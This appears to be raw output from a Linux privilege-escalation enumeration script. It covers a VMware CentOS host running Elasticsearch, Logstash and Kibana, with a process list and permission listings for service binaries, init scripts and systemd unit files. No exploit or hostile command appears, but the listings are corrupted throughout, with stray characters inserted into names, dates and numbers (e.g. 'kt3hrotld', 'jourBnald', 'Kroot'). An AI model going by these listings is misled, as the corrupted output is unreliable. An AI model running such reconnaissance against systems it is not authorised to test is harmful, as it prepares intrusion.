TTY STAT START TIME COMMAND root 1 0.0 0.1 128028 6572 ? Ss Apr02 0:03 /usr/lib/systemd/systemd --switched-root --system --deserialize 22 root 1 2 0.0 0.0 0 0 ? S Apr02 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S Apr02 0:01 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< Apr02 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? S Apr02 0:01 [kworker/u256:0] root 7 0.0 0.0 0 0 ? S Apr02 0:00 [migration/0] root 8 0.0 0.0 0 0 ? S Apr02 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? R Apr02 0:07 [rcu_sched] root 10 0.0 0.0 0 0 ? S< Apr02 0:00 [lru-add-drain] root 11 0.0 0.0 0 0 ? S Apr02 0:00 [watchdog/0] root 13 0.0 0.0 0 0 ? S Apr02 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? S< Apr02 0:00 [netns] root 15 0.0 0.0 0 0 ? S Apr02 0:00 [khungtaskd] root 16 0.0 0.0 0 0 ? S< Apr02 0:00 [wri2teback] root 17 0.0 0.0 0 0 ? S< Apr02 0:00 [kintegrityd] root 18 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset] root 19 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset] root 20 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset] root 21 0.0 0.0 0 0 ? S< Apr02 0:00 [kblockd] root 22 0.0 0.0 0 0 ? S< Apr02 0:00 [md] root 23 0.0 0.0 0 0 ? S< Apr02 0:00 [edac-poller] root 24 0.0 0.0 0 0 ? S< Apr02 0:00 [watchdogd] root 30 0.0 0.0 0 0 ? S Apr02 0:00 [kswapd0] root 31 0.0 0.0 0 0 ? SN Apr02 0:00 [ksmd] root 32 0.0 0.0 0 0 ? SN Apr02 0:00 [khugepaged] root 33 0.0 0.0 0 0 ? S< Apr02 0:00 [crypto] root 41 0.0 0.0 0 0 ? S< Apr02 0:00 [kt3hrotld] root 43 0.0 0.0 0 0 ? S< Apr02 0:00 [kmpath_rdacd] root 44 0.0 0.0 0 0 ? S< Apr02 0:00 [kaluad] root 45 0.0 0.0 0 0 ? S< Apr02 0:00 [kpsmoused] root 47 0.0 0.0 0 0 ? S< Apr02 0:00 [ipv6_addrconf] root 60 0.0 0.0 0 0 ? S< Apr02 0:00 [deferwq] root 91 0.0 0.0 0 0 ? S Apr02 0:00 [kauditd] root 1627 0.0 0.0 0 0 ? S< Apr02 0:00 [ata_sff] root 1632 0.0 0.0 0 0 ? S Apr02 0:00 [scsi_eh_0] root 1635 0.0 0.0 0 0 ? S< Apr02 0:00 [scsi_tmf_0] root 1638 0.0 0.0 0 0 ? S Apr02 0:00 [scsi_eh_1] root 1640 0.0 0.0 0 0 ? S< Apr02 0:00 [scsi_tmf_1] root 1642 0.0 0.0 0 0 ? R Apr02 0:00 [kworker/u256:2] root 1643 0.0 0.0 0 0 ? 4 S< Apr02 0:00 [mpt_poll_0] root 1644 0.0 0.0 0 0 ? S< Apr02 0:00 [mpt/0] root 2622 0.0 0.0 0 0 ? S< Apr02 0:00 [nfit] root 2692 0.0 0.0 0 0 ? S Apr02 0:00 [scsi_eh_2] root 2700 0.0 0.0 0 0 ? S< Apr02 0:00 [scsi_tmf_2] root 2762 0.0 0.0 0 0 ? S< Apr02 0:00 [ttm_swap] root 2769 0.0 0.0 0 0 ? S Apr02 0:00 [irq/16-vmwgfx] root 2947 0.0 0.0 0 0 ? S< Apr02 0:00 [kdmflush] root 2948 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset] root 2961 0.0 0.0 0 0 ? S< Apr02 0:00 [kdmflush] root 2964 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset] root 2981 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset] root 2986 0.0 0.0 0 0 ? S< Apr02 0:00 [xfsalloc] root 2991 0.0 0.0 0 5 0 ? S< Apr02 0:00 [xfs_mru_cache] root 2994 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-buf/dm-0] root 2997 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-data/dm-0] root 3000 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-conv/dm-0] root 3001 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-cil/dm-0] root 3002 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-reclaim/dm-] root 3003 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-log/dm-0] root 3004 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-eofblocks/d] root 3005 0.0 0.0 0 0 ? S Apr02 0:16 [xfsaild/dm-0] root 3006 0.0 0.0 0 0 ? S< Apr02 0:00 [kworker/0:1H] root 3072 0.0 0.1 40216 3968 ? Ss Apr02 0:00 /usr/lib/systemd/systemd-journald root 3088 0.0 0.1 127348 4132 ? Ss Apr02 0:00 /usr/sbin/lvmetad -f root 3101 0.0 06.1 48076 5572 ? Ss Apr02 0:02 /usr/lib/systemd/systemd-udevd root 4866 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-buf/sda1] root 4868 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-data/sda1] root 4869 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-conv/sda1] root 4873 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-cil/sda1] root 4880 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-reclaim/sda] root 4888 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-log/sda1] root 4889 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-eofblocks/s] root 4894 0.0 0.0 0 0 ? S Apr02 0:00 [xfsaild/sda1] root 6137 0.0 0.0 62044 1084 ? S<sl Apr02 0:00 /sbin/auditd root 6366 0.0 0.0 26376 1752 ? Ss Apr02 0:00 /usr/lib/systemd/systemd-logind root 6367 0.8 13.1 2719488 508092 ? SNsl Apr02 6:33 /bin/java -Xms500m -Xmx7500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logst8ash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete-9.1.13.0.jar:/usr/share/logstash/logstash-core/lib/jars/jsr305-1.3.9.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-api-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-core-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-slf4j-impl-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/logstash-core.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.commands-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.contenttype-3.4.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.expressions-3.4.300.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.filesystem-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.jobs-3.5.100.jar:/usr/share/logstash/logstash-core9/lib/jars/org.eclipse.core.resources-3.7.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.runtime-3.7.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.app-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.common-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.preferences-3.4.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.registry-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.jdt.core-3.10.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.osgi-3.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.text-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/slf4j-api-1.7.25.jar org.logstash.Logstash --path.settings /etc/logstash kibana 6370 0.3 5.2 1345080 204540 ? Ssl Apr02 3:03 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml polkitd 6371 0.0 0.3 613020 14000 ? Ssl A:pr02 0:00 /usr/lib/polkit-1/polkitd --no-debug dbus 6377 0.0 0.0 66500 2676 ? Ssl Apr02 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation chrony 6384 0.0 0.0 117784 1652 ? S Apr02 0:00 /usr/sbin/chronyd root 6417 0.0 0.0 126284 1692 ? Ss Apr02 0:00 /usr/sbin/crond -n root 6474 0.0 0.7 358584 29448 ? Ssl Apr02 0:01 /usr/bin/python -Es /usr/sbin/firewalld --nofork --nopid root 6475 0.0 0.0 110092 864 tty1 Ss+ Apr02 0:00 /sbin/agetty --noclear tty1 linux root 6540 0.0 0.2 476092 8372 ? Ssl Apr02 0:01 /usr/sbin/NetworkManager --no-daemon root 6738 0.1 0.2 272092 8516 ? Sl Apr02 0:47 /usr/sbin/vmtoolsd root 6772 0.0 0.1 59468 6036 ? S Apr02 0:00 /usr/lib/vmware-vgauth/VGAuthService -s root 7211 0.0 0.4 573828 17288 ? Ssl Apr02 0:05 /usr/bin/python2 -Es /usr/sbin/tuned -l -P root 7212 0.;0 0.1 112756 4356 ? Ss Apr02 0:00 /usr/sbin/sshd -D root 7214 0.0 0.1 222748 7568 ? Ssl Apr02 0:02 /usr/sbin/rsyslogd -n elastic+ 7216 0.9 34.9 3322412 1348764 ? Ssl Apr02 7:07 /bin/java -Xms1g -Xmx1g -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -XX:+AlwaysPreTouch -Xss1m -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djna.nosys=true -XX:-OmitStackTraceInFastThrow -Dio.netty.noUnsafe=true -Dio.netty.noKeySetOptimization=true -Dio.netty.recycler.maxCapacityPerThread=0 -Dlog4j.shutdownHookEnabled=false -Dlog4j2.disable.jmx=true -Djava.io.tmpdir=/tmp/elasticsearch.mJXMYZll -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/lib/elasticsearch -XX:ErrorFile=/var/log/elasticsearch/hs_err_pid%p.log -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintTenuringDistribution -XX:+PrintGCApplicationStoppedTime -Xloggc:/var/log/elasticsearch/gc.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=32 -XX:GCLogFileSize=64m --rwxr-xr-x. 1 root root 219K Nov 2 2018 /usr/bin/dbus-daemon 0 lrwxrwxrwx. 1 root root 7 Dec 11 2018 /usr/bin/python -> python2 0 lrwxrwxrwx. 1 root root 9 Dec 11 2018 /usr/bin/python2 -> python2.7 120K -rwxr-xr-x. 1 root root 118K Oct 30 2018 /usr/lib/polkit-1/polkitd 1.6M -rwxr-xr-x. 1 root root 1.6M Oct 30 2018 /usr/lib/systemd/systemd 340K -rwxr-xr-x. 1 root root 339K Oct 30 2018 /usr/lib/systemd/systemd-journald 624K -rwxr-xr-x. 1 root root 621K Oct 30 2018 /usr/lib/systemd/systemd-logind 408K -rwxr-xr-x. 1 root root 407K Oct 30 2018 /usr/lib/systemd/systemd-udevd 0 lrwxrwxrwx. 1 root root 37 Aug 27 2019 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin64/appLoader 256K -rwxr-xr-x. 1 root root 255K Apr 12 2018 /usr/sbin/chronyd 72K -rwxr-xr-x. 1 root root 69K Nov 20 2018 /usr/sbin/crond 68K -r-xr-xr-x. 1 root root 68K Nov 19 2018 /usr/sbin/lvmetad 2.5M -rwxr-xr-x. 1 root root 2.5M Nov 28 2018 /usr/sbin/NetworkManager 652K -rwxr-xr-x. 1 root ?root 649K Oct 30 2018 /usr/sbin/rsyslogd 836K -rwxr-xr-x. 1 root root 834K Apr 11 2018 /usr/sbin/sshd 0 lrwxrwxrwx. 1 root root 37 Aug 27 2019 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin64/vmtoolsd 84K -rwxr-xr-x. 1 root root 83K Sep 26 2018 /usr/share/elasticsearch/modules/x-pack-ml/platform/linux-x86_64/bin/controller 34M -rwxrwxr-x. 1 root root 34M Sep 26 2018 /usr/share/kibana/bin/../node/bin/node ESC[00;31m[-] /etc/init.d/ binary permissions:ESC[00m lrwxrwxrwx. 1 root root 11 Nov 28 2018 /etc/init.d -> rc.d/init.d ESC[00;31m[-] /etc/rc.d/init.d binary permissions:ESC[00m total 96 drwxr-xr-x. 2 root root 125 Aug 27 2019 . drwxr-xr-x. 10 root root 127 Oct 30 2018 .. -rwxr-x---. 1 root root 4080 Sep 26 2018 elasticsearch -rw-r--r--. 1 root root 18281 Aug 24 2018 functions -rwxr-xr-x. 1 root root 3524 Sep 26 2018 kibana -rwxr-xr-x. 1 root root 4569 Aug 24 2018 netconsole -rwxr-xr-x. 1 root root 7923 Aug 24 2018 network -rw-r--r--. 1 root root 1160 Oct @30 2018 README -rwxr-xr-x. 1 root root 45702 Aug 27 2019 vmware-tools ESC[00;31m[-] /lib/systemd/* config file permissions:ESC[00m /lib/systemd/: total 7.8M drwxr-xr-x. 25 root root 12K Jan 23 2019 system drwxr-xr-x. 2 root root 4.0K Dec 11 2018 system-generators drwxr-xr-x. 2 root root 271 Dec 11 2018 user drwxr-xr-x. 2 root root 144 Dec 11 2018 system-preset drwxr-xr-x. 2 root root 162 Dec 11 2018 catalog lrwxrwxrwx. 1 root root 24 Nov 28 2018 systemd-sysv-install -> ../../..//sbin/chkconfig -rwxr-xr-x. 1 root root 1.6M Oct 30 2018 systemd -rwxr-xr-x. 1 root root 74K Oct 30 2018 systemd-backlight -rwxr-xr-x. 1 root root 65K Oct 30 2018 systemd-binfmt -rwxr-xr-x. 1 root root 36K Oct 30 2018 systemd-cgroups-agent -rwxr-xr-x. 1 root root 134K Oct 30 2018 systemd-coredump -rwxr-xr-x. 1 root root 41K Oct 30 2018 systemd-hibernate-resume -rwxr-xr-x. 1 root root 364K Oct 30 2018 systemd-importd -rwxr-xr-x. 1 root root 376K Oct 30 2018 systemd-localed -rwxr-xr-x. 1 Aroot root 45K Oct 30 2018 systemd-quotacheck -rwxr-xr-x. 1 root root 49K Oct 30 2018 systemd-random-seed -rwxr-xr-x. 1 root root 98K Oct 30 2018 systemd-readahead -rwxr-xr-x. 1 root root 61K Oct 30 2018 systemd-remount-fs -rwxr-xr-x. 1 root root 69K Oct 30 2018 systemd-sysctl -rwxr-xr-x. 1 root root 377K Oct 30 2018 systemd-timedated -rwxr-xr-x. 1 root root 45K Oct 30 2018 systemd-update-done -rwxr-xr-x. 1 root root 45K Oct 30 2018 systemd-user-sessions -rwxr-xr-x. 1 root root 53K Oct 30 2018 systemd-vconsole-setup -rwxr-xr-x. 1 root root 24K Oct 30 2018 systemd-ac-power -rwxr-xr-x. 1 root root 69K Oct 30 2018 systemd-activate -rwxr-xr-x. 1 root root 130K Oct 30 2018 systemd-bootchart -rwxr-xr-x. 1 root root 102K Oct 30 2018 systemd-cryptsetup -rwxr-xr-x. 1 root root 332K Oct 30 2018 systemd-fsck -rwxr-xr-x. 1 root root 368K Oct 30 2018 systemd-hostnamed -rwxr-xr-x. 1 root root 310K Oct 30 2018 systemd-initctl -rwxr-xr-x. 1 root root 339K Oct 30 2018 systemd-jourBnald -rwxr-xr-x. 1 root root 621K Oct 30 2018 systemd-logind -rwxr-xr-x. 1 root root 483K Oct 30 2018 systemd-machined -rwxr-xr-x. 1 root root 53K Oct 30 2018 systemd-machine-id-commit -rwxr-xr-x. 1 root root 65K Oct 30 2018 systemd-modules-load -rwxr-xr-x. 1 root root 184K Oct 30 2018 systemd-pull -rwxr-xr-x. 1 root root 37K Oct 30 2018 systemd-reply-password -rwxr-xr-x. 1 root root 61K Oct 30 2018 systemd-rfkill -rwxr-xr-x. 1 root root 147K Oct 30 2018 systemd-shutdown -rwxr-xr-x. 1 root root 65K Oct 30 2018 systemd-shutdownd -rwxr-xr-x. 1 root root 90K Oct 30 2018 systemd-sleep -rwxr-xr-x. 1 root root 106K Oct 30 2018 systemd-socket-proxyd -rwxr-xr-x. 1 root root 407K Oct 30 2018 systemd-udevd -rwxr-xr-x. 1 root root 310K Oct 30 2018 systemd-update-utmp drwxr-xr-x. 2 root root 6 Oct 30 2018 user-preset drwxr-xr-x. 2 root root 29 Oct 30 2018 ntp-units.d drwxr-xr-x. 2 root root 6 Oct 30 2018 system-shutdown drwxr-xr-x. 2 root root 6 Oct 30 2018 system-slCeep drwxr-xr-x. 2 root root 6 Oct 30 2018 user-generators -rw-r--r--. 1 root root 9.4K Oct 30 2018 import-pubring.gpg -rwxr-xr-x. 1 root root 2.4K Aug 24 2018 rhel-autorelabel -rwxr-xr-x. 1 root root 399 Aug 24 2018 rhel-configure -rwxr-xr-x. 1 root root 110 Aug 24 2018 rhel-dmesg -rwxr-xr-x. 1 root root 158 Aug 24 2018 rhel-domainname -rwxr-xr-x. 1 root root 1.1K Aug 24 2018 rhel-import-state -rwxr-xr-x. 1 root root 233 Aug 24 2018 rhel-loadmodules -rwxr-xr-x. 1 root root 5.8K Aug 24 2018 rhel-readonly /lib/systemd/system: total 824K drwxr-xr-x. 2 root root 67 Dec 11 2018 basic.target.wants drwxr-xr-x. 2 root root 258 Dec 11 2018 multi-user.target.wants drwxr-xr-x. 2 root root 189 Dec 11 2018 sockets.target.wants lrwxrwxrwx. 1 root root 12 Dec 11 2018 messagebus.service -> dbus.service drwxr-xr-x. 2 root root 42 Dec 11 2018 timers.target.wants drwxr-xr-x. 2 root root 4.0K Dec 11 2018 sysinit.target.wants drwxr-xr-x. 2 root root 50 Dec 11 2018 runlevel5.targetD.wants lrwxrwxrwx. 1 root root 13 Dec 11 2018 runlevel6.target -> reboot.target drwxr-xr-x. 2 root root 50 Dec 11 2018 runlevel3.target.wants lrwxrwxrwx. 1 root root 17 Dec 11 2018 runlevel4.target -> multi-user.target drwxr-xr-x. 2 root root 50 Dec 11 2018 runlevel4.target.wants lrwxrwxrwx. 1 root root 16 Dec 11 2018 runlevel5.target -> graphical.target drwxr-xr-x. 2 root root 50 Dec 11 2018 runlevel1.target.wants lrwxrwxrwx. 1 root root 17 Dec 11 2018 runlevel2.target -> multi-user.target drwxr-xr-x. 2 root root 50 Dec 11 2018 runlevel2.target.wants lrwxrwxrwx. 1 root root 17 Dec 11 2018 runlevel3.target -> multi-user.target lrwxrwxrwx. 1 root root 15 Dec 11 2018 runlevel0.target -> poweroff.target lrwxrwxrwx. 1 root root 13 Dec 11 2018 runlevel1.target -> rescue.target drwxr-xr-x. 2 root root 50 Dec 11 2018 rescue.target.wants drwxr-xr-x. 2 root root 81 Dec 11 2018 reboot.target.wants drwxr-xr-x. 2 root root 83 Dec 11 2018 poweroff.target.wEants drwxr-xr-x. 2 root root 40 Dec 11 2018 local-fs.target.wants drwxr-xr-x. 2 root root 50 Dec 11 2018 graphical.target.wants lrwxrwxrwx. 1 root root 16 Dec 11 2018 default.target -> graphical.target lrwxrwxrwx. 1 root root 23 Dec 11 2018 dbus-org.freedesktop.import1.service -> systemd-importd.service lrwxrwxrwx. 1 root root 23 Dec 11 2018 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx. 1 root root 22 Dec 11 2018 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx. 1 root root 24 Dec 11 2018 dbus-org.freedesktop.machine1.service -> systemd-machined.service lrwxrwxrwx. 1 root root 25 Dec 11 2018 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service lrwxrwxrwx. 1 root root 13 Dec 11 2018 ctrl-alt-del.target -> reboot.target lrwxrwxrwx. 1 root root 25 Dec 11 2018 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx. 1 root root 14 Dec 11 2018 autovt@.service ->F; getty@.service drwxr-xr-x. 2 root root 225 Dec 11 2018 initrd.target.wants drwxr-xr-x. 2 root root 37 Dec 11 2018 shutdown.target.wants lrwxrwxrwx. 1 root root 56 Dec 11 2018 dracut-pre-udev.service -> ../../dracut/modules.d/98systemd/dracut-pre-udev.service lrwxrwxrwx. 1 root root 56 Dec 11 2018 dracut-shutdown.service -> ../../dracut/modules.d/98systemd/dracut-shutdown.service lrwxrwxrwx. 1 root root 55 Dec 11 2018 dracut-cmdline.service -> ../../dracut/modules.d/98systemd/dracut-cmdline.service lrwxrwxrwx. 1 root root 57 Dec 11 2018 dracut-initqueue.service -> ../../dracut/modules.d/98systemd/dracut-initqueue.service lrwxrwxrwx. 1 root root 53 Dec 11 2018 dracut-mount.service -> ../../dracut/modules.d/98systemd/dracut-mount.service lrwxrwxrwx. 1 root root 57 Dec 11 2018 dracut-pre-mount.service -> ../../dracut/modules.d/98systemd/dracut-pre-mount.service lrwxrwxrwx. 1 root root 57 Dec 11 2018 dracut-pre-pivot.service -> ../../dracut/modules.d/98systemd/dGracut-pre-pivot.service lrwxrwxrwx. 1 root root 59 Dec 11 2018 dracut-pre-trigger.service -> ../../dracut/modules.d/98systemd/dracut-pre-trigger.service -rw-r--r--. 1 root root 294 Nov 29 2018 cpupower.service -rw-r--r--. 1 root root 353 Nov 28 2018 NetworkManager-dispatcher.service -rw-r--r--. 1 root root 1.5K Nov 28 2018 NetworkManager.service -rw-r--r--. 1 root root 303 Nov 28 2018 NetworkManager-wait-online.service -rw-r--r--. 1 root root 527 Nov 28 2018 selinux-policy-migrate-local-changes@.service drwxr-xr-x. 2 root root 35 Nov 28 2018 halt.target.wants drwxr-xr-x. 2 root root 72 Nov 28 2018 initrd-switch-root.target.wants drwxr-xr-x. 2 root root 36 Nov 28 2018 kexec.target.wants -rw-r--r--. 1 root root 284 Nov 20 2018 crond.service -r--r--r--. 1 root root 406 Nov 19 2018 blk-availability.service -r--r--r--. 1 root root 345 Nov 19 2018 dm-event.service -r--r--r--. 1 root root 248 Nov 19 2018 dm-event.socket -r--r--r--. 1 root root 314 Nov 19 2018 lvm2-lvmetad.servicHe -r--r--r--. 1 root root 241 Nov 19 2018 lvm2-lvmetad.socket -r--r--r--. 1 root root 304 Nov 19 2018 lvm2-lvmpolld.service -r--r--r--. 1 root root 239 Nov 19 2018 lvm2-lvmpolld.socket -r--r--r--. 1 root root 666 Nov 19 2018 lvm2-monitor.service -r--r--r--. 1 root root 411 Nov 19 2018 lvm2-pvscan@.service -rw-r--r--. 1 root root 313 Nov 4 2018 kdump.service -rw-r--r--. 1 root root 366 Nov 2 2018 dbus.service -rw-r--r--. 1 root root 102 Nov 2 2018 dbus.socket drwxr-xr-x. 2 root root 6 Oct 30 2018 dbus.target.wants drwxr-xr-x. 2 root root 6 Oct 30 2018 default.target.wants drwxr-xr-x. 2 root root 6 Oct 30 2018 syslog.target.wants -rw-r--r--. 1 root root 517 Oct 30 2018 basic.target -rw-r--r--. 1 root root 379 Oct 30 2018 bluetooth.target -rw-r--r--. 1 root root 787 Oct 30 2018 console-getty.service -rw-r--r--. 1 root root 749 Oct 30 2018 console-shell.service -rw-r--r--. 1 root root 808 Oct 30 2018 container-getty@.service -rw-r--r--. 1 root root 425 Oct 30 2018 crIyptsetup-pre.target -rw-r--r--. 1 root root 372 Oct 30 2018 cryptsetup.target -rw-r--r--. 1 root root 1014 Oct 30 2018 debug-shell.service -rw-r--r--. 1 root root 670 Oct 30 2018 dev-hugepages.mount -rw-r--r--. 1 root root 590 Oct 30 2018 dev-mqueue.mount -rw-r--r--. 1 root root 976 Oct 30 2018 emergency.service -rw-r--r--. 1 root root 431 Oct 30 2018 emergency.target -rw-r--r--. 1 root root 440 Oct 30 2018 final.target -rw-r--r--. 1 root root 466 Oct 30 2018 getty-pre.target -rw-r--r--. 1 root root 1.6K Oct 30 2018 getty@.service -rw-r--r--. 1 root root 460 Oct 30 2018 getty.target -rw-r--r--. 1 root root 558 Oct 30 2018 graphical.target -rw-r--r--. 1 root root 565 Oct 30 2018 halt-local.service -rw-r--r--. 1 root root 487 Oct 30 2018 halt.target -rw-r--r--. 1 root root 447 Oct 30 2018 hibernate.target -rw-r--r--. 1 root root 468 Oct 30 2018 hybrid-sleep.target -rw-r--r--. 1 root root 634 Oct 30 2018 initrd-cleanup.service -rw-r--r--. 1 root root 553 Oct 30 2018 initrd-fs.Jtarget -rw-r--r--. 1 root root 802 Oct 30 2018 initrd-parse-etc.service -rw-r--r--. 1 root root 526 Oct 30 2018 initrd-root-fs.target -rw-r--r--. 1 root root 644 Oct 30 2018 initrd-switch-root.service -rw-r--r--. 1 root root 691 Oct 30 2018 initrd-switch-root.target -rw-r--r--. 1 root root 671 Oct 30 2018 initrd.target -rw-r--r--. 1 root root 668 Oct 30 2018 initrd-udevadm-cleanup-db.service -rw-r--r--. 1 root root 501 Oct 30 2018 kexec.target -rw-r--r--. 1 root root 679 Oct 30 2018 kmod-static-nodes.service -rw-r--r--. 1 root root 395 Oct 30 2018 local-fs-pre.target -rw-r--r--. 1 root root 507 Oct 30 2018 local-fs.target -rw-r--r--. 1 root root 405 Oct 30 2018 machine.slice -rw-r--r--. 1 root root 531 Oct 30 2018 machines.target -rw-r--r--. 1 root root 492 Oct 30 2018 multi-user.target -rw-r--r--. 1 root root 464 Oct 30 2018 network-online.target -rw-r--r--. 1 root root 461 Oct 30 2018 network-pre.target -rw-r--r--. 1 root root 480 Oct 30 2018 network.target -rw-r--r--. 1 Kroot root 514 Oct 30 2018 nss-lookup.target -rw-r--r--. 1 root root 473 Oct 30 2018 nss-user-lookup.target -rw-r--r--. 1 root root 354 Oct 30 2018 paths.target -rw-r--r--. 1 root root 552 Oct 30 2018 poweroff.target -rw-r--r--. 1 root root 377 Oct 30 2018 printer.target -rw-r--r--. 1 root root 705 Oct 30 2018 proc-sys-fs-binfmt_misc.automount -rw-r--r--. 1 root root 615 Oct 30 2018 proc-sys-fs-binfmt_misc.mount -rw-r--r--. 1 root root 643 Oct 30 2018 quotaon.service -rw-r--r--. 1 root root 632 Oct 30 2018 rc-local.service -rw-r--r--. 1 root root 543 Oct 30 2018 reboot.target -rw-r--r--. 1 root root 509 Oct 30 2018 remote-cryptsetup.target -rw-r--r--. 1 root root 396 Oct 30 2018 remote-fs-pre.target -rw-r--r--. 1 root root 482 Oct 30 2018 remote-fs.target -rw-r--r--. 1 root root 979 Oct 30 2018 rescue.service -rw-r--r--. 1 root root 486 Oct 30 2018 rescue.target -rw-r--r--. 1 root root 500 Oct 30 2018 rpcbind.target -rw-r--r--. 1 root root 1.1K Oct 30 2018 serial-getty@.serLvice -rw-r--r--. 1 root root 402 Oct 30 2018 shutdown.target -rw-r--r--. 1 root root 362 Oct 30 2018 sigpwr.target -rw-r--r--. 1 root root 420 Oct 30 2018 sleep.target -rw-r--r--. 1 root root 403 Oct 30 2018 -.slice -rw-r--r--. 1 root root 409 Oct 30 2018 slices.target -rw-r--r--. 1 root root 380 Oct 30 2018 smartcard.target -rw-r--r--. 1 root root 356 Oct 30 2018 sockets.target -rw-r--r--. 1 root root 380 Oct 30 2018 sound.target -rw-r--r--. 1 root root 441 Oct 30 2018 suspend.target -rw-r--r--. 1 root root 353 Oct 30 2018 swap.target -rw-r--r--. 1 root root 681 Oct 30 2018 sys-fs-fuse-connections.mount -rw-r--r--. 1 root root 518 Oct 30 2018 sysinit.target -rw-r--r--. 1 root root 719 Oct 30 2018 sys-kernel-config.mount -rw-r--r--. 1 root root 662 Oct 30 2018 sys-kernel-debug.mount -rw-r--r--. 1 root root 1.3K Oct 30 2018 syslog.socket -rw-r--r--. 1 root root 646 Oct 30 2018 systemd-ask-password-console.path -rw-r--r--. 1 root root 657 Oct 30 2018 systemd-ask-password-conMsole.service -rw-r--r--. 1 root root 574 Oct 30 2018 systemd-ask-password-wall.path -rw-r--r--. 1 root root 689 Oct 30 2018 systemd-ask-password-wall.service -rw-r--r--. 1 root root 799 Oct 30 2018 systemd-backlight@.service -rw-r--r--. 1 root root 1.1K Oct 30 2018 systemd-binfmt.service -rw-r--r--. 1 root root 654 Oct 30 2018 systemd-bootchart.service -rw-r--r--. 1 root root 826 Oct 30 2018 systemd-firstboot.service -rw-r--r--. 1 root root 682 Oct 30 2018 systemd-fsck-root.service -rw-r--r--. 1 root root 702 Oct 30 2018 systemd-fsck@.service -rw-r--r--. 1 root root 548 Oct 30 2018 systemd-halt.service -rw-r--r--. 1 root root 635 Oct 30 2018 systemd-hibernate-resume@.service -rw-r--r--. 1 root root 505 Oct 30 2018 systemd-hibernate.service -rw-r--r--. 1 root root 714 Oct 30 2018 systemd-hostnamed.service -rw-r--r--. 1 